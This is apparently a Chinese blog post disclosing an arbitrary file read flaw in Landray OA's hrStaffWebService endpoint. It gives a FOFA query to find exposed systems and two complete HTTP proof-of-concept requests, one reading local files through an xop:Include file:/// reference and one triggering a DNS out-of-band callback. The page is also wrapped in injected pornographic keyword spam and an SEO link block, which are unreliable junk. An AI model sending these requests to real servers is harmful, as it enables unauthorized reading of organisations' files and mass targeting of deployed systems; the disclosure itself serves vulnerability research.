<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      藍凌OA /sys/webservice/hrStaffWebService存在任意文件讀取漏洞

      藍凌OA /sys/webservice/hrStaffWebService接口處存在任意文件讀取漏洞

      FOFA

      app="Landray-OA系統"

      POC

      • 文件讀取
      POST /sys/webservice/hrStaffWebService HTTP/1.1
      Host: 
      Content-Type: multipart/related; boundary=----j0ofrwsv2dtllbzzkyh9
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
      Content-Length: 619
      Connection: close
      
      ------j0ofrwsv2dtllbzzkyh9
      Content-Disposition: form-data; name="1"
      
      <soapenv:Envelope xmlns:soapenv="" xmlns:web="http://webservice.staff.hr.kmss.landray.com/">
      <soapenv:Header>
      <soapenv:Body>
          <web:getHrStaffElements>
              <arg0>
                  <beginTimeStamp>1</beginTimeStamp>
                  <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///"></xop:Include></count>
              </arg0>
          </web:getHrStaffElements>
      </soapenv:Body>
      </soapenv:Header>
      </soapenv:Envelope>
      ------j0ofrwsv2dtllbzzkyh9--
      
      • DNS帶外
        因為這個漏洞第一眼就覺得是XXE漏洞,然后就測試了下XXE的DNS帶外的方式。
      POST /sys/webservice/hrStaffWebService HTTP/1.1
      Host: 
      Content-Type: multipart/related; boundary=----j0ofrwsv2dtllbzzkyh9
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
      Content-Length: 598
      Connection: close
      SOAPAction: ""
      
      ------j0ofrwsv2dtllbzzkyh9
      Content-Disposition: form-data; name="1"
      
      <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.staff.hr.kmss.landray.com/">
      <soapenv:Header>
      <soapenv:Body>
          <web:getHrStaffElements>
              <arg0>
                  <beginTimeStamp>1</beginTimeStamp>
                  <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="http://dns網址"></xop:Include></count>
              </arg0>
          </web:getHrStaffElements>
      </soapenv:Body>
      </soapenv:Header>
      </soapenv:Envelope>
      ------j0ofrwsv2dtllbzzkyh9--
      
      posted @ 2024-11-07 10:29  NPC001  閱讀(1422)  評論(0)    收藏  舉報
      主站蜘蛛池模板: 亚洲aⅴ男人的天堂在线观看| 麻豆天美东精91厂制片| 97欧美精品系列一区二区| 精品国精品无码自拍自在线| 美女黄网站人色视频免费国产| 久久亚洲av成人无码软件| 国产真实伦在线观看视频| 亚洲色欲在线播放一区二区三区| 在线观看视频一区二区三区| 国产精品久久久久影院色| 女人张开腿无遮无挡视频| 胸大美女又黄的网站| 久久青青草原国产精品最新片| 日韩精品久久不卡中文字幕| 又爆又大又粗又硬又黄的a片| 中文文字幕文字幕亚洲色| 久久成人伊人欧洲精品| 国99久9在线 | 免费| 婷婷六月色| 中文字幕在线日韩| 天啦噜国产精品亚洲精品| 在线播放国产精品亚洲| 五月丁香啪啪| 国产综合视频一区二区三区| 在线日韩日本国产亚洲| 欧美色欧美亚洲另类二区| 成人污视频| 开心五月婷婷综合网站| 亚洲色大成永久WW网站| 成人片黄网站色大片免费毛片| 成年无码av片完整版| 亚洲欧洲日韩精品在线| 久久午夜夜伦鲁鲁片免费无码| 精品国产一区二区色老头| 丰满的少妇一区二区三区| 国产乱码精品一区二三区| 亚洲欧洲色图片网站| 吉川爱美一区二区三区视频| 欧美喷潮最猛视频| 久久一日本综合色鬼综合色 | 宝贝腿开大点我添添公视频免 |